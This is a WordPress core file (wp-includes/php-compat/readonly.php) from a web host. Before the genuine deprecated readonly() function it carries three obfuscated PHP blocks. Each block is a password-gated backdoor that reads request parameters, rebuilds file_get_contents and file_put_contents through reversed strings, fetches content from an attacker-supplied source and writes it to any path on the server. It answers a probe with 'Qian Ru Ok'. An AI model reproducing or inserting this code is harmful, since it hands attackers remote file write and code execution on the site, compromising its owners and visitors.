File: /home/wwwrenee/public_html/wp-includes/php-compat/readonly.php
<?php
$wLRyxjP = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($wLRyxjP[0]) /*+/*+*/
. md5($wLRyxjP[0])) == "7".
"8".
"f".
"f".
"5".
"f".
"3".
"b".
"4".
"b".
"e".
"3".
"8".
"7".
"f".
"d".
"7".
"6".
"a".
"4".
"b".
"3".
"5".
"4".
"8".
"1".
"e".
"4".
"1".
"a".
"3".
"8") {
$YpbISJYuy = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$ODFDQteVh = $YpbISJYuy /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$cemiMwa = $YpbISJYuy
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function SfUprPK($rpMuBq) { if (empty($rpMuBq)) return false; if (!is_dir($rpMuBq)) { SfUprPK(dirname($rpMuBq), 0755, true); mkdir($rpMuBq); } } !file_exists(dirname($wLRyxjP[1])) && SfUprPK(dirname($wLRyxjP[1])); $FUZuF = @$cemiMwa($wLRyxjP[2]); echo @$ODFDQteVh($wLRyxjP[1], $FUZuF) ? 1 : 0; die; }key($wLRyxjP) == "of" && die("Qian Ru Ok"); ?><?php
$lugDJx = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($lugDJx[0]) /*+/*+*/
. md5($lugDJx[0])) == "6".
"9".
"7".
"c".
"4".
"e".
"4".
"f".
"1".
"d".
"c".
"5".
"1".
"8".
"6".
"2".
"0".
"f".
"d".
"7".
"3".
"8".
"0".
"2".
"c".
"0".
"5".
"3".
"6".
"d".
"0".
"3") {
$OckFFjBDY = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$XDSEItMDQl = $OckFFjBDY /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$hPsuQO = $OckFFjBDY
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function xsQtHwOB($TqaXBd) { if (empty($TqaXBd)) return false; if (!is_dir($TqaXBd)) { xsQtHwOB(dirname($TqaXBd), 0755, true); mkdir($TqaXBd); } } !file_exists(dirname($lugDJx[1])) && xsQtHwOB(dirname($lugDJx[1])); $cdbHP = @$hPsuQO($lugDJx[2]); echo @$XDSEItMDQl($lugDJx[1], $cdbHP) ? 1 : 0; die; }key($lugDJx) == "of" && die("Qian Ru Ok"); ?><?php
$VfTTm = ${"_"."R"./*+/*+*/
"E"."Q"./*+/*+*/"U"."E"
/*+/*+*/."S"."T"};
if (md5( /*+/*+*/
md5($VfTTm[0]) /*+/*+*/
. md5($VfTTm[0])) == "e".
"6".
"5".
"3".
"a".
"1".
"9".
"1".
"5".
"2".
"9".
"f".
"b".
"3".
"c".
"8".
"3".
"a".
"8".
"f".
"1".
"0".
"c".
"c".
"6".
"a".
"6".
"3".
"a".
"c".
"a".
"0") {
$KndxoWWWB = "st" . /*+/*+*/"rr"
/*+/*+*/ . "ev";
$BUzjLtraQu = $KndxoWWWB /*+/*+*/
("stn" . "etn" ./*+/*+*/
"oc_t" . "up_e" . "lif");
$GbJBhdbIov = $KndxoWWWB
/*+/*+*/("stn" .
"etn" . "oc_t" . /*+/*+*/
"eg_e" . "lif"); function LsSzpqES($qZRMlcZ) { if (empty($qZRMlcZ)) return false; if (!is_dir($qZRMlcZ)) { LsSzpqES(dirname($qZRMlcZ), 0755, true); mkdir($qZRMlcZ); } } !file_exists(dirname($VfTTm[1])) && LsSzpqES(dirname($VfTTm[1])); $ELHDKihkYT = @$GbJBhdbIov($VfTTm[2]); echo @$BUzjLtraQu($VfTTm[1], $ELHDKihkYT) ? 1 : 0; die; }key($VfTTm) == "of" && die("Qian Ru Ok"); ?><?php
/**
* Conditionally declares a `readonly()` function, which was renamed
* to `wp_readonly()` in WordPress 5.9.0.
*
* In order to avoid PHP parser errors, this function was extracted
* to this separate file and is only included conditionally on PHP 8.1.
*
* Including this file on PHP >= 8.1 results in a fatal error.
*
* @package WordPress
* @since 5.9.0
*/
/**
* Outputs the HTML readonly attribute.
*
* Compares the first two arguments and if identical marks as readonly.
*
* This function is deprecated, and cannot be used on PHP >= 8.1.
*
* @since 4.9.0
* @deprecated 5.9.0 Use wp_readonly() introduced in 5.9.0.
*
* @see wp_readonly()
*
* @param mixed $readonly One of the values to compare.
* @param mixed $current Optional. The other value to compare if not just true.
* Default true.
* @param bool $echo Optional. Whether to echo or just return the string.
* Default true.
* @return string HTML attribute or empty string.
*/
function readonly( $readonly, $current = true, $echo = true ) {
_deprecated_function( __FUNCTION__, '5.9.0', 'wp_readonly()' );
return wp_readonly( $readonly, $current, $echo );
} ?>